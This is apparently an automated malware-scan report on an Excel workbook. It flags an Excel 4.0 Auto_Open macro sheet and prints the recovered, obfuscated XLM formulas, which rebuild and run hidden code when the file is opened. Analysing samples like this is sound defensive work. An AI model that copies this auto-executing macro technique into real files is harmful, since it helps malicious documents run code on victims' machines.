Verdict: MALICIOUS
Risk Score: 140
Heuristics (3)
- Excel 4.0 Auto_Open defined name (critical, OLE_XLM_AUTOOPEN_DEFINEDNAME): oletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
- XLM Auto_Open with dangerous formula APIs (critical, OLE_XLM_DANGEROUS_FN): Excel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
- Excel 4.0 (XLM) macro sheet present (medium, OLE_XLM_AUTOOPEN): Workbook contains an Excel 4.0 macro sheet sub-stream. XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| xlm_macros.txt | xlm-macro | oletools.olevba.extract_all_macros (XLM macro listing) | 6678 bytes |

SHA-256: ed5e3da5560225b644e6ce9b95180fee3676e4aa078efbc8e502ab1d030eeb43

Preview script: first 1,000 lines of the extracted script
' 0085 14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible - Sheet
' 0085 19 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible - hRZfNmxpCq
' 0018 23 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open len=7 ptgRef3d Sheet!F135
' 0018 21 LABEL : Cell Value, String Constant - BzLgtl len=0
' 0018 20 LABEL : Cell Value, String Constant - CikWI len=0
' 0018 21 LABEL : Cell Value, String Constant - cSAZfm len=0
' 0018 21 LABEL : Cell Value, String Constant - DfLMrr len=0
' 0018 20 LABEL : Cell Value, String Constant - EUtac len=0
' 0018 26 LABEL : Cell Value, String Constant - FGajavxjvhj len=0
' 0018 23 LABEL : Cell Value, String Constant - FQuxzyhx len=0
' 0018 26 LABEL : Cell Value, String Constant - hrTnrEbWdCn len=0
' 0018 21 LABEL : Cell Value, String Constant - Imwfdf len=0
' 0018 26 LABEL : Cell Value, String Constant - LBhvitXSpgf len=0
' 0018 20 LABEL : Cell Value, String Constant - nhhGX len=0
' 0018 22 LABEL : Cell Value, String Constant - nLUEBxT len=0
' 0018 21 LABEL : Cell Value, String Constant - QoSFQs len=0
' 0018 25 LABEL : Cell Value, String Constant - RgcZOqGSiE len=0
' 0018 27 LABEL : Cell Value, String Constant - UBtgGHZawUlw len=0
' 0018 26 LABEL : Cell Value, String Constant - WAAzcLhAQuG len=0
' 0018 27 LABEL : Cell Value, String Constant - yCumVhcbyPtn len=0
' 0018 24 LABEL : Cell Value, String Constant - yVnwnXIxU len=0
' 0018 21 LABEL : Cell Value, String Constant - yYdUtP len=0
' 0018 21 LABEL : Cell Value, String Constant - zgCubu len=0
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' Sheet,Reference,Formula,Value
' hRZfNmxpCq,F41,"SET.NAME("DfLMrr",VALUE("0"))",""
' hRZfNmxpCq,F45,"SET.NAME("hrTnrEbWdCn",DfLMrr)",""
' hRZfNmxpCq,F49,"SET.NAME("Imwfdf",DfLMrr)",""
' hRZfNmxpCq,F54,"SET.NAME("yCumVhcbyPtn",COUNTA(CikWI))",""
' hRZfNmxpCq,F57,"SET.NAME("EUtac",COUNTA(QoSFQs))",""
' hRZfNmxpCq,F61,[],""
' hRZfNmxpCq,F63,"SET.NAME("LBhvitXSpgf","")",""
' hRZfNmxpCq,F66,"hrTnrEbWdCn",""
' hRZfNmxpCq,F71,"SET.NAME("yVnwnXIxU",HLOOKUP("*",CikWI,hrTnrEbWdCn,FALSE))",""
' hRZfNmxpCq,F75,"RgcZOqGSiE",""
' hRZfNmxpCq,F77,"SET.NAME("zgCubu",DfLMrr)",""
' hRZfNmxpCq,F81,[],""
' hRZfNmxpCq,F85,"zgCubu",""
' hRZfNmxpCq,F89,"BzLgtl",""
' hRZfNmxpCq,F93,"FQuxzyhx",""
' hRZfNmxpCq,F98,"nLUEBxT",""
' hRZfNmxpCq,F102,"SET.NAME("UBtgGHZawUlw",VALUE(HLOOKUP("*",QoSFQs,nLUEBxT,FALSE)))",""
' hRZfNmxpCq,F105,"WAAzcLhAQuG",""
' hRZfNmxpCq,F109,"LBhvitXSpgf",""
' hRZfNmxpCq,F114,"Imwfdf",""
' hRZfNmxpCq,F118,NEXT(),""
' hRZfNmxpCq,F121,"nhhGX",""
' hRZfNmxpCq,F123,"SET.NAME("f",INT(T(FORMULA(T(LBhvitXSpgf)&"",""&T(nhhGX)))))",""
' hRZfNmxpCq,F128,"FGajavxjvhj",""
' hRZfNmxpCq,F130,NEXT(),""
' hRZfNmxpCq,F133,RETURN(),""
' hRZfNmxpCq,F163,"SET.NAME("yYdUtP",F41)",""
' hRZfNmxpCq,F167,"CikWI",""
' hRZfNmxpCq,F171,"SET.NAME("QoSFQs",R67C13)",""
' hRZfNmxpCq,F175,"SET.NAME("FGajavxjvhj",183)",""
' hRZfNmxpCq,F177,"SET.NAME("cSAZfm",6)",""
' hRZfNmxpCq,F182,yYdUtP(),""
' hRZfNmxpCq,F183,HALT(),""